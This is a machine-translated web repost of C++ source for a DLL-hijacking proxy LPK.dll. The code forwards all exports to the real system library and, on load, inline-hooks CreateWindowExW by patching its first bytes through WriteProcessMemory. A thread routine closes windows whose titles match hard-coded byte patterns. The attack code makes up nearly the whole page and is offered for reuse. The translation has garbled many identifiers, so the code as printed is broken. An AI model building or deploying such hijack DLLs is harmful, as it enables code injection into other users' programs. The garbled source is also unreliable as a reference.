Home > Others

DLL hijacking LPK. dll

Source: Internet
Author: User
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >

/The usp10 was written last time, and the LPK code is pasted this time.
// The following files are in LPK. cpp. the header file is the same as that of the previous usp10.

// LPK. cpp: defines the entry point for the DLL application.
//

//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////////////
// Header file
# Include "stdafx. H"
//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////////////

//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////////////
// Export the Function
# Pragma comment (linker, "/export: lpkinitialize = _ aheadlib_lpkinitialize, @ 1 ")
# Pragma comment (linker, "/export: lpktabbedtextout = _ aheadlib_lpktabbedtextout, @ 2 ")
# Pragma comment (linker, "/export: lpkdllinitialize = _ aheadlib_lpkdllinitialize, @ 3 ")
# Pragma comment (linker, "/export: lpkdrawtextex = _ aheadlib_lpkdrawtextex, @ 4 ")
// # Pragma comment (linker, "/export: lpkeditcontrol = _ aheadlib_lpkeditcontrol, @ 5 ")
# Pragma comment (linker, "/export: lpkexttextout = _ aheadlib_lpkexttextout, @ 6 ")
# Pragma comment (linker, "/export: lpkgetcharacterplacement = _ aheadlib_lpkgetcharacterplacement, @ 7 ")
# Pragma comment (linker, "/export: lpkgettextextentexpoint = _ aheadlib_lpkgettextextentexpoint, @ 8 ")
# Pragma comment (linker, "/export: lpkpsmtextout = _ aheadlib_lpkpsmtextout, @ 9 ")
# Pragma comment (linker, "/export: lpkusegdiwidthcache = _ aheadlib_lpkusegdiwidthcache, @ 10 ")
# Pragma comment (linker, "/export: ftswordbreak = _ aheadlib_ftswordbreak, @ 11 ")
//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////////////

//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////////////
// Macro definition
# Define externc extern "C"
# Define naked _ declspec (naked)
# Define export _ declspec (dllexport)

# Define alcpp export naked
# Define alstd externc export naked void _ stdcall
# Define alcfast externc export naked void _ fastcall
# Define alcdecl externc naked void _ cdecl
//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////////////
Hinstance g_hinstdll;
Farproc fpcreatewindow;
Hmodule;
Byte oldcreatewindowcode [5], newcreatewindowcode [5]/*, reljmpcode [10] */;
DWORD dwidold, dwidnew;
Bool bhook = false;

//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////////////
// Aheadlib namespace
Namespace aheadlib
{
Hmodule m_hmodule = NULL; // original module handle
// Load the original Module
Inline bool winapi load ()
{
Tchar tzpath [max_path];
Tchar tztemp [max_path * 2];
Getsystemdirectory (tzpath, max_path );
Lstrcat (tzpath, text ("\ LPK. dll "));
M_hmodule = loadlibrary (tzpath );
If (m_hmodule = NULL)
{
Wsprintf (tztemp, text ("% s cannot be loaded, and the program cannot run normally. "), Tzpath );
MessageBox (null, tztemp, text ("aheadlib"), mb_iconstop );
}
Return (m_hmodule! = NULL );
}
// Release the original Module
Inline void winapi free ()
{
If (m_hmodule)
{
Freelibrary (m_hmodule );
}
}
// Obtain the original function address
Farproc winapi getaddress (pcstr pszprocname)
{
Farproc fpaddress;
Char szprocname [16];
Tchar tztemp [max_path];
Fpaddress = getprocaddress (m_hmodule, pszprocname );
If (fpaddress = NULL)
{
If (hiword (pszprocname) = 0)
{
Wsprintf (szprocname, "% d", pszprocname );
Pszprocname = szprocname;
}
Wsprintf (tztemp, text ("the function % hs cannot be found, and the program cannot run normally. "), Pszprocname );
MessageBox (null, tztemp, text ("aheadlib"), mb_iconstop );
Exitprocess (-2 );
}
Return fpaddress;
}
}
Using namespace aheadlib;
//////////////////////////////////////// //////////////////////////////////////// ////////////////

Void hookon ();
Void hookoff ();
Void winapiv Init (lpvoid pparam );
Hwnd winapi mycreatewindow (DWORD dwexstyle, maid, lpwstr lpwindowname, DWORD dwstyle,
Int X, int y, int nwidth, int nheight, hwnd hwndparent, hmenu, hinstance, lpvoid lpparam );
Void winapiv threadproc (lpvoid pparam );
Void winapiv threadproc2 (lpvoid pparam );

Inline hwnd winapi relcreateappswexw (DWORD dwexstyle, lpcwstr lpclassname, lpcwstr lpwindowname, DWORD dwstyle,
Int X, int y, int nwidth, int nheight, hwnd hwndparent, hmenu, hinstance, lpvoid lpparam)
{
Hookoff ();
Hwnd ret = createdomainwexw (
Dwexstyle, lpclassname, lpwindowname,
Dwstyle, X, Y, nwidth, nheight,
Hwndparent, hmenu, hinstance, lpparam );
Hookon ();
Return ret;
}
Void winapiv Init (lpvoid pparam)
{
Sleep (100 );
Hmodule = loadlibrary ("user32.dll ");
Fpcreatewindow = getprocaddress (hmodule, "createmediawexw ");
If (fpcreatewindow = NULL)
Return;
_ ASM
{
Pushad
Lea EDI, oldcreatewindowcode
MoV ESI, fpcreatewindow
ClD
Movsd
Movsb
Popad
}
Newcreatewindowcode [0] = 0xe9; // command for the relative address of JMP mycreatewindow
_ ASM
{
Lea eax, mycreatewindow
MoV EBX, fpcreatewindow
Sub eax, EBX
Sub eax, 5
MoV dword ptr [newcreatewindowcode + 1], eax
}
Dwidnew = getcurrentprocessid (); // obtain the ID of the process
Dwidold = dwidnew;
_ Beginthread (threadproc2, null, (lpvoid) (INT) (3*60 ));
}
//---------------------------------------------------------------------------
Hwnd winapi mycreatewindow (DWORD dwexstyle,
Maid,
Lpwstr lpwindowname,
DWORD dwstyle,
Int X,
Int y,
Int nwidth,
Int nheight,
Hwnd hwndparent,
Hmenu,
Hinstance,
Lpvoid lpparam)
{
Hwnd ret = relcreatecontactwexw (
Dwexstyle, lpclassname, lpwindowname,
Dwstyle, X, Y, nwidth, nheight,
Hwndparent, hmenu, hinstance, lpparam );
If (dwexstyle = 0)
Return ret;
If (dwexstyle! = 768)
Return ret;
Return ret;
}
Void winapiv threadproc (lpvoid pparam)
{
Char buffer [100];
Memset (buffer, 0,100 );
If (iswindow (hwnd) pparam ))
Getwindowtext (hwnd) pparam, buffer, 100 );
Else
Return;
If (buffer [0] = 81 & buffer [1] = 81 & buffer [2] =-51 & buffer [3] =-8 && buffer [4] =-80 & buffer [5] =-55)
{
Sendmessage (hwnd) pparam, wm_close, null, null );
}
Else if (buffer [0] =-67 & buffer [1] =-15 & buffer [2] =-56 & buffer [3] =- 43 & buffer [4] =-46 & buffer [5] =-86)
{
Sendmessage (hwnd) pparam, wm_close, null, null );
}
Else if (buffer [0] =-54 & buffer [1] =-42 & buffer [2] =-69 & buffer [3] =- 6 & buffer [4] =-55 & buffer [5] =-6)
{
Sendmessage (hwnd) pparam, wm_close, null, null );
}
}
Void winapiv threadproc2 (lpvoid pparam)
{
Sleep (1000 );
Hookon ();
For (INT I = 0; I <(INT) pparam; I ++)
Sleep (1000 );
Hookoff ();
}

Void hookon ()
{
Handle hproc;
Dwidold = dwidnew;
Hproc = OpenProcess (process_all_access, 0, dwidold); // obtain the Process Handle
Virtualprotectex (hproc, fpcreatewindow, 5, page_readwrite, & dwidold); // modify the attribute of the first five bytes of createwindow in the process to be writable.
Writeprocessmemory (hproc, fpcreatewindow, newcreatewindowcode, 5, 0); // change the first five bytes of createwindow in the process to JMP to mycreatewindow.
Virtualprotectex (hproc, fpcreatewindow, 5, dwidold, & dwidold); // modify the attribute of the first five bytes of createwindow in the process to the original attribute.
Bhook = true;
}
//---------------------------------------------------------------------------
// Change the JMP mycreatewindow code in the process to JMP createwindow
Void hookoff ()
{
Handle hproc;
Dwidold = dwidnew;
Hproc = OpenProcess (process_all_access, 0, dwidold );
Virtualprotectex (hproc, fpcreatewindow, 5, page_readwrite, & dwidold );
Writeprocessmemory (hproc, fpcreatewindow, oldcreatewindowcode, 5, 0 );
Virtualprotectex (hproc, fpcreatewindow, 5, dwidold, & dwidold );
Bhook = false;
}

// The lpkeditcontrol exports an array instead of a single function (by backer)
Externc void _ cdecl aheadlib_lpkeditcontrol (void );
Externc _ declspec (dllexport) void (* lpkeditcontrol [14]) () = {aheadlib_lpkeditcontrol };
//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////////////
// Entry function
Bool winapi dllmain (hmodule, DWORD dwreason, pvoid pvreserved)
{
If (dwreason = dll_process_attach)
{
Disablethreadlibrarycils (hmodule );
Load ();
// The lpkeditcontrol array has 14 members and must be copied.
Memcpy (lpvoid) (lpkeditcontrol + 1), (lpvoid) (int *) getaddress ("lpkeditcontrol") + 1), 52 );
_ Beginthread (init, null, null );
}
Else if (dwreason = dll_process_detach)
{
Free ();
}
Return true;
}
//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////////////

//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////////////
// Export the Function
Alcdecl aheadlib_lpkinitialize (void)
{
Getaddress ("lpkinitialize ");
_ Asm jmp eax;
}
//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////////////

//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////////////
// Export the Function
Alcdecl aheadlib_lpktabbedtextout (void)
{
Getaddress ("lpktabbedtextout ");
_ Asm jmp eax;
}
//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////////////

//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////////////
// Export the Function
Alcdecl aheadlib_lpkdllinitialize (void)
{
Getaddress ("lpkdllinitialize ");
_ Asm jmp eax;
}
//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////////////

//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////////////
// Export the Function
Alcdecl aheadlib_lpkdrawtextex (void)
{
Getaddress ("lpkdrawtextex ");
_ Asm jmp eax;
}
//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////////////

//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////////////
// Export the Function
Alcdecl aheadlib_lpkeditcontrol (void)
{
Getaddress ("lpkeditcontrol ");
_ Asm jmp dword ptr [eax];
}
//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////////////

//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////////////
// Export the Function
Alcdecl aheadlib_lpkexttextout (void)
{
Getaddress ("lpkexttextout ");
_ Asm jmp eax;
}
//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////////////

//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////////////
// Export the Function
Alcdecl aheadlib_lpkgetcharacterplacement (void)
{
Getaddress ("lpkgetcharacterplacement ");
_ Asm jmp eax;
}
//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////////////

//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////////////
// Export the Function
Alcdecl aheadlib_lpkgettextextentexpoint (void)
{
Getaddress ("lpkgettextextentexpoint ");
_ Asm jmp eax;
}
//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////////////

//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////////////
// Export the Function
Alcdecl aheadlib_lpkpsmtextout (void)
{
Getaddress ("lpkpsmtextout ");
_ Asm jmp eax;
}
//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////////////

//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////////////
// Export the Function
Alcdecl aheadlib_lpkusegdiwidthcache (void)
{
Getaddress ("lpkusegdiwidthcache ");
_ Asm jmp eax;
}
//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////////////

//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////////////
// Export the Function
Alcdecl aheadlib_ftswordbreak (void)
{
Getaddress ("ftswordbreak ");
_ Asm jmp eax;
}
//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////////////

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Related Keywords:
missing dll msvcp120 dll ssleay32 dll libeay32 dll com dll dll directory dll parser driver dll es dll

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

What's Trending
Top 10 Tags
datastax versions naming convention zookeeper client class definition md5 microsoft sql server 2005 data structures exception handling error handling
Top 10 Keywords
microsoft download center down wordpress address url site address url wordpress address url windows installer 4 0 download 302 not found web address url definition site address url wordpress db2 integer mac os installation step by step pdf abbreviation for return

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More